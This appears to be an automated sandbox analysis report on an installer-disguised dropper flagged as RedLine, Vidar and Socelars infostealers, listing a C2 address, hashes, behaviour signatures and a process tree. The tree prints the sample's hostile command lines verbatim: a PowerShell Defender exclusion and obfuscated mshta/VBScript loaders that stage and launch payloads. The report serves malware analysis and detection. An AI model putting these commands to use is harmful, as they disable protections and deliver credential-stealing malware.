Resubmissions
08-10-2021 15:07
211008-shl8xsefa9 1008-10-2021 05:38
211008-gbvqyadce8 1007-10-2021 18:28
211007-w4jayacge3 10Analysis
-
max time kernel
104s -
max time network
1742s -
platform
windows11_x64 -
resource
win11 -
submitted
08-10-2021 15:07
General
-
Target
setup_x86_x64_install.exe
-
Size
5.9MB
-
MD5
0308d3044eda0db671c58c2a97cb3c10
-
SHA1
1737ab616a61d35b0bde0aaad949d9894e14be9e
-
SHA256
b52242da50ea2b3a05f6787dfa7197a0c99442e91d3bc78b71363c2ff3c4f072
-
SHA512
29902fe4a53319290d18b65a6baa1d747f1389a84cd7eb1a123d05b418b737336cd54c84b76403bc2cbb1f078c19b4461a89eec8214bfcdcf4831bb1dbda0e3e
Score
10/10
Malware Config
Extracted
Family
redline
Botnet
media214
C2
91.121.67.60:2151
Signatures
-
Arkei
Arkei is an infostealer written in C++.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 6 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Arkei Stealer Payload 1 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
-
ASPack v2.12-2.42 7 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Downloads MZ/PE file
-
Executes dropped EXE 51 IoCs
-
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 13 IoCs
-
Themida packer 1 IoCs
Detects Themida, an advanced Windows software protection system.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 7 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 13 IoCs
-
Drops file in Windows directory 8 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 5 IoCs
-
Checks processor information in registry 2 TTPs 37 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 10 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies data under HKEY_USERS 59 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu166f9a8bbe80.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu166f9a8bbe80.exeThu166f9a8bbe80.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\Pictures\Adobe Films\CTqxJvmkZWJ2hSOaCWXQYm0F.exe"C:\Users\Admin\Pictures\Adobe Films\CTqxJvmkZWJ2hSOaCWXQYm0F.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\Pictures\Adobe Films\iXQYAVs6MRuQ70gZkJxgUQD0.exe"C:\Users\Admin\Pictures\Adobe Films\iXQYAVs6MRuQ70gZkJxgUQD0.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\oMfUtIrKOohZfNXsczbdLhWB.exe"C:\Users\Admin\Pictures\Adobe Films\oMfUtIrKOohZfNXsczbdLhWB.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\yQTciQ6mzkKqUfVaQ7PT65g4.exe"C:\Users\Admin\Pictures\Adobe Films\yQTciQ6mzkKqUfVaQ7PT65g4.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Program Files (x86)\Company\NewProduct\inst002.exe"C:\Program Files (x86)\Company\NewProduct\inst002.exe"7⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\cm3.exe"C:\Program Files (x86)\Company\NewProduct\cm3.exe"7⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
- Executes dropped EXE
-
-
-
C:\Users\Admin\Pictures\Adobe Films\UkcKlVZQaU1T_Tk9fg4DF8Ki.exe"C:\Users\Admin\Pictures\Adobe Films\UkcKlVZQaU1T_Tk9fg4DF8Ki.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbscRipt: ClOsE ( CrEATEoBjeCT ( "wsCrIpt.shELl" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c TyPe ""C:\Users\Admin\Pictures\Adobe Films\UkcKlVZQaU1T_Tk9fg4DF8Ki.exe"" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if """" == """" for %Q IN ( ""C:\Users\Admin\Pictures\Adobe Films\UkcKlVZQaU1T_Tk9fg4DF8Ki.exe"" ) do taskkill /f /Im ""%~nxQ"" ", 0 , TRUe ))7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /Q /c TyPe "C:\Users\Admin\Pictures\Adobe Films\UkcKlVZQaU1T_Tk9fg4DF8Ki.exe" > ..\aDLsKHQL9R.exE && STaRT ..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K9 & if "" == "" for %Q IN ( "C:\Users\Admin\Pictures\Adobe Films\UkcKlVZQaU1T_Tk9fg4DF8Ki.exe" ) do taskkill /f /Im "%~nxQ"8⤵
-
C:\Users\Admin\AppData\Local\Temp\aDLsKHQL9R.exE..\aDLsKHQL9R.exe -pb0sP2z4l4ZpZ1d2K99⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /Im "UkcKlVZQaU1T_Tk9fg4DF8Ki.exe"9⤵
- Kills process with taskkill
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\IZhhQdf_ACsnY6fHlUQZ46_g.exe"C:\Users\Admin\Pictures\Adobe Films\IZhhQdf_ACsnY6fHlUQZ46_g.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\Xq3lxPgxhf9lRFGn1DpnsgGn.exe"C:\Users\Admin\Pictures\Adobe Films\Xq3lxPgxhf9lRFGn1DpnsgGn.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\KY178SxWqF7xJkZmPeytWy0D.exe"C:\Users\Admin\Pictures\Adobe Films\KY178SxWqF7xJkZmPeytWy0D.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\_tPSqRpRyrQiGtNHdV8ZKH2_.exe"C:\Users\Admin\Pictures\Adobe Films\_tPSqRpRyrQiGtNHdV8ZKH2_.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\aVL0zwShl8SDM1Nhz4DDXwuK.exe"C:\Users\Admin\Pictures\Adobe Films\aVL0zwShl8SDM1Nhz4DDXwuK.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\nDem2Jj4S0zSItlPpl20peBR.exe"C:\Users\Admin\Pictures\Adobe Films\nDem2Jj4S0zSItlPpl20peBR.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2348 -s 2687⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
C:\Users\Admin\Pictures\Adobe Films\tKVL2GRlhB4ATa0L_pLwGWwS.exe"C:\Users\Admin\Pictures\Adobe Films\tKVL2GRlhB4ATa0L_pLwGWwS.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
-
C:\Users\Admin\Pictures\Adobe Films\XbzmnUPhLrMtgqN8uKCWL4Vr.exe"C:\Users\Admin\Pictures\Adobe Films\XbzmnUPhLrMtgqN8uKCWL4Vr.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\xU4QVhhGGYDpDzhnPmCPdFLD.exe"C:\Users\Admin\Pictures\Adobe Films\xU4QVhhGGYDpDzhnPmCPdFLD.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\fOQQaX1MpyY3WzsCPUPgeZgi.exe"C:\Users\Admin\Pictures\Adobe Films\fOQQaX1MpyY3WzsCPUPgeZgi.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\D6eI4LPczor41omES2LAPc49.exe"C:\Users\Admin\Pictures\Adobe Films\D6eI4LPczor41omES2LAPc49.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\IXWADmXTn7yzfCjqQJR3tQtJ.exe"C:\Users\Admin\Pictures\Adobe Films\IXWADmXTn7yzfCjqQJR3tQtJ.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\Pictures\Adobe Films\1YwD9ZqQyzsXxSid0bUX5EDp.exe"C:\Users\Admin\Pictures\Adobe Films\1YwD9ZqQyzsXxSid0bUX5EDp.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\Pictures\Adobe Films\y7eBlbaWBu4kU7qKHtScbK5T.exe"C:\Users\Admin\Pictures\Adobe Films\y7eBlbaWBu4kU7qKHtScbK5T.exe"6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\Pictures\Adobe Films\kmFxwYZ2_riHTMNxvwhtahYb.exe"C:\Users\Admin\Pictures\Adobe Films\kmFxwYZ2_riHTMNxvwhtahYb.exe"6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16205451b994.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu16205451b994.exeThu16205451b994.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 3086⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu161580bf75.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu161580bf75.exeThu161580bf75.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\7231721.scr"C:\Users\Admin\AppData\Roaming\7231721.scr" /S6⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\6647442.scr"C:\Users\Admin\AppData\Roaming\6647442.scr" /S6⤵
- Executes dropped EXE
- Adds Run key to start application
-
-
C:\Users\Admin\AppData\Roaming\6036748.scr"C:\Users\Admin\AppData\Roaming\6036748.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\6686198.scr"C:\Users\Admin\AppData\Roaming\6686198.scr" /S6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Roaming\3990905.scr"C:\Users\Admin\AppData\Roaming\3990905.scr" /S6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu165bd34b1e1d4d81.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu165bd34b1e1d4d81.exeThu165bd34b1e1d4d81.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4548 -s 17926⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu164ba03be19.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu164ba03be19.exeThu164ba03be19.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu164ba03be19.exeC:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu164ba03be19.exe6⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu167d514d2a7ac5a.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu167d514d2a7ac5a.exeThu167d514d2a7ac5a.exe5⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1653d94a8da.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu1653d94a8da.exeThu1653d94a8da.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu1653d94a8da.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu1653d94a8da.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )6⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f3de88a335950bb.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16f584bd3686.exe4⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu16466b26f8b7.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu16466b26f8b7.exeThu16466b26f8b7.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4816 -s 3046⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu1628aafb3efd7c3d.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu1628aafb3efd7c3d.exeThu1628aafb3efd7c3d.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 3086⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
-
-
-
-
-
C:\Windows\System32\Upfc.exeC:\Windows\System32\Upfc.exe /launchtype periodic /cv U7uDbNUVK0qEePFEnXb6KQ.01⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv U7uDbNUVK0qEePFEnXb6KQ.0.22⤵
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 638d76f9cd8a8ff69c52fd20b3886a7b U7uDbNUVK0qEePFEnXb6KQ.0.1.0.3.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\uus\AMD64\MoUsoCoreWorker.exeC:\Windows\uus\AMD64\MoUsoCoreWorker.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu16f3de88a335950bb.exeThu16f3de88a335950bb.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-U8VP1.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-U8VP1.tmp\Thu16f3de88a335950bb.tmp" /SL5="$3016C,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu16f3de88a335950bb.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu16f3de88a335950bb.exe"C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu16f3de88a335950bb.exe" /SILENT3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-2TUIS.tmp\Thu16f3de88a335950bb.tmp"C:\Users\Admin\AppData\Local\Temp\is-2TUIS.tmp\Thu16f3de88a335950bb.tmp" /SL5="$4016C,1570064,56832,C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu16f3de88a335950bb.exe" /SILENT4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-HMKEO.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-HMKEO.tmp\postback.exe" ss15⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss15⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart5⤵
- Executes dropped EXE
-
C:\cd1fb31a915a56e5f3809a105885\Setup.exeC:\cd1fb31a915a56e5f3809a105885\\Setup.exe /q /norestart /x86 /x64 /web6⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu16f584bd3686.exeThu16f584bd3686.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu1653d94a8da.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0A4612F3\Thu1653d94a8da.exe" ) do taskkill /F -Im "%~NxU"1⤵
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"4⤵
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "5⤵
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Thu1653d94a8da.exe"2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2516 -ip 25161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3276 -ip 32761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 4816 -ip 48161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 4548 -ip 45481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 5376 -ip 53761⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 2348 -ip 23481⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3a14855 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in Windows directory
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.0MB
-
Filesize
16KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
6.1MB
-
Filesize
8KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
16KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
152KB
-
Filesize
1.5MB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
288KB
-
Filesize
164KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
1.3MB
-
Filesize
856KB
-
Filesize
496KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
64KB
-
Filesize
72KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
68KB
-
Filesize
36KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
40KB
-
Filesize
2.5MB
-
Filesize
500KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
48KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
70.1MB
-
Filesize
69.2MB